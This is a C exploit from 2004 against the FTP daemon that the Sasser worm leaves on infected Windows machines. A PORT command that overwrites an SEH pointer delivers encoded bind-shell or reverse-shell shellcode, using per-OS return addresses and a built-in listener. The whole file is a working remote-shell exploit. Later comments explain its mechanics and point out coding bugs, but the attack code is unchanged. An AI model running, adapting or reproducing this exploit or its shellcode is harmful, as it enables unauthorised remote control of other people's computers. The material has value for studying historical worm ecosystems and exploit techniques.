/*
_________ / ___// ____/ ____/
/ ___/ __ \\__ \/ __/ / /
/ / / /_/ /__/ / /___/ /___
/_/ \____/____/_____/\____/
- ROMANIAN SECURITY RESEARCH 2004 -
sasser v[a-e] exploit (of its ftpd server)
exploit version 1.4, public
author: mandragore
date: Mon May 10 16:13:31 2004
vuln type: SEH ptr overwriting
greets: rosecurity team
discovery: edcba
note: sasser.e has its ftpd on port 1023
update: offsets
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define NORM "\033[00;00m"
#define GREEN "\033[01;32m"
#define YELL "\033[01;33m"
#define RED "\033[01;31m"
#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.4 for " RED "sasser.x" NORM
#define fatal(x) { perror(x); exit(1); }
#define default_port 5554
/* Per-OS constants, selected by the -t index (see usage() and main()).
 * Field order: display name, "pop pop ret" address (goreg), and the two
 * pointer values setoff() patches into the payload (gpa, lla). All three
 * are declared long, but the code only ever copies 4 bytes of each, so a
 * little-endian build is assumed; on LP64 the long is wider than what is
 * used. */
struct { char *os; long goreg; long gpa; long lla;}
targets[] = {
// { "os", pop pop ret, GetProcAd ptr, LoadLib ptr },
{ "wXP SP1 many", 0x77BEEB23, 0x77be10CC, 0x77be10D0 }, // msvcrt.dll's
{ "wXP SP1 most others", 0x77C1C0BD, 0x77C110CC, 0x77c110D0 },
{ "w2k SP4 many", 0x7801D081, 0x780320cc, 0x780320d0 },
}, tsz; /* second object of the same anonymous struct type; only used as a sizeof() operand in usage() */
/* Payload bytes for the "bind" variant (-s bind, the default). Treated as
 * opaque data: setoff() and main() overwrite fixed offsets inside it
 * (0x1d, 0x2e, 0x57). There is no NUL terminator, yet main() sizes the
 * array with strlen() -- that read runs past the end of the array, which
 * is undefined behaviour. */
unsigned char bsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,
0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,
0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,
0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,
0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,
0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,
0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,
0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,
0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,
0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,
0xC8,0x21,0x0E
};
/* Payload bytes for the "rev" variant (-s rev); patched at offsets 0x1d,
 * 0x2e, 0x53 and 0x5a. Same missing-terminator / strlen() issue as bsh. */
unsigned char rsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,
0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,
0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,
0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,
0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,
0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,
0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,
0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E
};
char verbose=0; /* -v counter; its only effect is the "verbose!" line printed by main() */
/* Write the two target-specific pointer values into both payload arrays.
 * GPA, LLA: the gpa/lla fields of the chosen targets[] entry (main()).
 * Each value is masked with 0xdededede -- the same constant main() applies
 * to the address and (as 0xdede) the port it patches -- and then 4 bytes
 * are copied to offsets 0x1d and 0x2e of bsh and of rsh. The long is
 * narrowed to int so that exactly 4 bytes are staged; copying the int
 * raw assumes a little-endian host, which nothing checks.
 * memcpy() is declared in <string.h>; the file only includes <strings.h>,
 * so this relies on an implicit declaration. */
void setoff(long GPA, long LLA) {
int gpa=GPA^0xdededede, lla=LLA^0xdededede;
memcpy(bsh+0x1d,&gpa,4);
memcpy(bsh+0x2e,&lla,4);
memcpy(rsh+0x1d,&gpa,4);
memcpy(rsh+0x2e,&lla,4);
}
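/* Print the usage text and the table of supported targets, then exit(1).
 *
 * argv0: program name shown in the synopsis line.
 * Never returns. The target list is generated from targets[] so that the
 * help output and the -t index cannot drift apart. */
void usage(char *argv0) {
    printf("%s -d <host/ip> [opts]\n\n",argv0);
    printf("Options:\n");
    printf(" -h undocumented\n");
    /* default_port is an int constant, so %d is the matching conversion
     * (the previous %u was a type mismatch). */
    printf(" -p <port> to connect to [default: %d]\n",default_port);
    printf(" -s <'bind'/'rev'> shellcode type [default: bind]\n");
    printf(" -P <port> for the shellcode [default: 5300]\n");
    printf(" -H <host/ip> for the reverse shellcode\n");
    printf(" -L setup the listener for the reverse shell\n");
    printf(" -t <target type> [default 0]; choose below\n\n");
    printf("Types:\n");
    /* size_t index: sizeof() is unsigned, so an int counter would make the
     * loop condition a signed/unsigned comparison. The element size is
     * taken from targets[0] instead of a separate dummy object. */
    for (size_t i = 0; i < sizeof targets / sizeof targets[0]; i++) {
        /* goreg is declared long, so the conversion has to be %lx; a bare
         * %x is a type mismatch. %zu matches the size_t index. */
        printf(" %zu %s\t[0x%.8lx]\n", i, targets[i].os, targets[i].goreg);
    }
    exit(1);
}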
/* Relay between the terminal and socket s: data arriving on either side is
 * forwarded to the other. Loops until an error or EOF on either side and
 * then leaves through fatal(), which exit()s -- this function never
 * returns to its caller. select() and FD_* need <sys/select.h>, which the
 * file does not include. */
void shell(int s) {
char buff[4096];
int retval;
fd_set fds;
printf("[+] connected!\n\n");
for (;;) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(s,&fds);
if (select(s+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select()");
if (FD_ISSET(0,&fds)) {
/* select() reported fd 0 (stdin) readable, but the read is issued on
 * fd 1 (stdout). That only works while both refer to the same terminal;
 * with redirected input it blocks or fails. Looks like a typo for 0. */
if ((retval = read(1,buff,4096)) < 1)
fatal("[-] shell.recv(stdin)");
send(s,buff,retval,0); /* return value unchecked: a short send is silently dropped */
}
if (FD_ISSET(s,&fds)) {
if ((retval = recv(s,buff,4096,0)) < 1)
fatal("[-] shell.recv(socket)");
write(1,buff,retval); /* likewise unchecked */
}
}
}
/* Runs in the child forked by main() when -L is given: listen on `port`
 * for a single incoming connection and hand the accepted socket to
 * shell(). Address and socket constants are written as raw numbers
 * (2 = AF_INET, 1 = SOCK_STREAM, 6 = IPPROTO_TCP on Linux) rather than
 * the named macros, so this is not portable. */
void callback(short port) {
struct sockaddr_in sin; /* never zeroed; only family, address and port are set */
int s,slen=16; /* accept() expects a socklen_t*; an int* is passed */
sin.sin_family = 2;
sin.sin_addr.s_addr = 0; /* INADDR_ANY */
sin.sin_port = htons(port);
s=socket(2,1,6); /* unchecked: on failure -1 is handed straight to bind() */
if ( bind(s,(struct sockaddr *)&sin, 16) ) {
/* Listener could not be set up: SIGKILL the parent before exiting,
 * presumably so it does not continue without a listener. Note the
 * parent's own pid check cannot distinguish this from a normal child. */
kill(getppid(),SIGKILL);
fatal("[-] shell.bind");
}
listen(s,1); /* return value unchecked */
/* The accepted socket overwrites the listening one, so the listener fd
 * is never closed (leaked until process exit); accept() result unchecked. */
s=accept(s,(struct sockaddr *)&sin,&slen);
shell(s);
printf("crap\n"); /* not reached in practice: shell() only leaves via fatal() */
}
/* Entry point: parse options, resolve the target host, optionally fork a
 * listener (callback()), then send a single oversized FTP "PORT" line
 * assembled from the selected targets[] entry and payload variant. With
 * the default bind variant it then connects to Port and enters shell();
 * with -L it waits for the forked child instead.
 *
 * Option-parser weaknesses visible here (documented, not changed):
 *  - every option is assumed to carry a value (i += 2) and argv[i+1] is
 *    read without an argc check, so a final option without a value
 *    indexes past argv; -L/-v/-h compensate with i--;
 *  - host and Host stay uninitialized until -d / -H are seen, so running
 *    without -d hands an indeterminate pointer to gethostbyname();
 *  - type (-t) is never range-checked against targets[];
 *  - `a ?: b` is a GCC extension, not standard C.
 * The third parameter (env) is unused. <stdlib.h>, <string.h>,
 * <unistd.h>, <sys/socket.h>, <arpa/inet.h> and <sys/wait.h> are not
 * included, so several calls below rely on implicit declarations. */
int main(int argc, char **argv, char **env) {
struct sockaddr_in sin; /* target address; reused later with the bind port */
struct hostent *he;
char *host; int port=default_port; /* -d / -p */
char *Host; int Port=5300; char bindopt=1; /* -H / -P / -s ("rev" clears bindopt) */
int i,s,pid=0,rip; /* pid doubles as the -L flag and, after fork(), the child's pid */
char *buff;
int type=0; /* -t index into targets[] */
char *jmp[]={"\xeb\x06","\xe9\x13\xfc\xff\xff"}; /* two short code stubs placed at offsets 272 and 280 below */
printf(BANNER "\n");
if (argc==1)
usage(argv[0]);
for (i=1;i<argc;i+=2) {
if (strlen(argv[i]) != 2)
usage(argv[0]);
switch(argv[i][1]) {
case 't':
type=atoi(argv[i+1]);
break;
case 'd':
host=argv[i+1];
break;
case 'p':
port=atoi(argv[i+1])?:default_port; /* GCC ?: extension: non-zero atoi() result, else the default */
break;
case 's':
if (strstr(argv[i+1],"rev"))
bindopt=0;
break;
case 'H':
Host=argv[i+1];
break;
case 'P':
Port=atoi(argv[i+1])?:5300;
/* Mask with 0xdede and byte-swap, patch the low 2 bytes of the int into
 * both payloads (little-endian assumed), then repeat both steps to
 * restore Port for display. The round trip only works because the mask
 * is byte-symmetric (swap and xor commute) and Port fits in 16 bits;
 * a -P value above 65535 is not rejected. */
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
memcpy(bsh+0x57,&Port,2);
memcpy(rsh+0x5a,&Port,2);
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
break;
case 'L':
pid++; i--; /* flag-only option: undo the i+=2 stride */
break;
case 'v':
verbose++; i--;
break;
case 'h':
usage(argv[0]); /* never returns, so the fall-through into default is moot */
default:
usage(argv[0]);
}
}
if (verbose)
printf("verbose!\n");
if ((he=gethostbyname(host))==NULL)
fatal("[-] gethostbyname()");
sin.sin_family = 2; /* raw AF_INET value; sin is not zeroed first */
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
sin.sin_port = htons(port);
printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);
if (bindopt)
printf("[.] will try to put a bindshell on port %d.\n",Port);
else {
if ((he=gethostbyname(Host))==NULL)
fatal("[-] gethostbyname() for -H");
/* Reads sizeof(long) bytes from a 4-byte IPv4 address: an over-read on
 * LP64, where only the low 4 bytes (little-endian) survive the narrowing
 * to int. Masked with the same 0xdededede constant setoff() uses. */
rip=*((long *)he->h_addr_list[0]);
rip=rip^0xdededede;
memcpy(rsh+0x53,&rip,4);
if (pid) {
printf("[.] setting up a listener on port %d.\n",Port);
pid=fork();
/* Child runs callback(); the parent carries on. A failed fork() (-1) is
 * not handled: pid stays -1, and the kill(pid,SIGKILL) on connect
 * failure below would then be kill(-1, SIGKILL), i.e. it would signal
 * every process this user is allowed to signal. */
switch (pid) { case 0: callback(Port); }
} else
printf("[.] you should have a listener on %s:%d.\n",inet_ntoa(*((struct in_addr
*)he->h_addr_list[0])),Port);
}
printf("[.] using type '%s'\n",targets[type].os); /* type unchecked: an out-of-range -t reads past targets[] */
// -------------------- core
s=socket(2,1,6); /* AF_INET / SOCK_STREAM / IPPROTO_TCP as raw numbers; result unchecked */
if (connect(s,(struct sockaddr *)&sin,16)!=0) {
if (pid) kill(pid,SIGKILL);
fatal("[-] connect()");
}
printf("[+] connected, sending exploit\n");
buff=(char *)malloc(4096); /* unchecked allocation; the cast is unnecessary in C */
bzero(buff,4096);
/* FTP login exchange; the replies are read into buff and discarded
 * (recv() results ignored). */
sprintf(buff,"USER x\n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);
sprintf(buff,"PASS x\n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);
/* Build the PORT line: 2000 bytes of 0x90, "PORT " over the first five,
 * "\n" appended at index 2000 (the first NUL left by bzero). Control
 * values go to fixed offsets 272/276/280 and the payload to 300, all
 * inside the filler. */
memset(buff+0000,0x90,2000);
strncpy(buff,"PORT ",5); /* exactly 5 bytes, no terminator: the filler continues after it */
strcat(buff,"\x0a");
memcpy(buff+272,jmp[0],2);
memcpy(buff+276,&targets[type].goreg,4); /* first 4 bytes of a long: little-endian assumed */
memcpy(buff+280,jmp[1],5);
setoff(targets[type].gpa, targets[type].lla);
/* bsh/rsh carry no NUL terminator, so strlen() on them runs past the
 * array (undefined behaviour); how many bytes are actually copied depends
 * on whatever the linker placed after the array. */
if (bindopt)
memcpy(buff+300,&bsh,strlen(bsh));
else
memcpy(buff+300,&rsh,strlen(rsh));
send(s,buff,strlen(buff),0); /* strlen stops at the first NUL, i.e. after the "\n" unless a patched byte is zero; return value unchecked */
free(buff);
close(s);
// -------------------- end of core
if (bindopt) {
/* Reuse sin with the payload port and give the remote side a second. */
sin.sin_port = htons(Port);
sleep(1);
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] exploit most likely failed");
shell(s);
}
if (pid) wait(&pid); /* reaps the -L child; pid is overwritten with its exit status */
exit(0);
}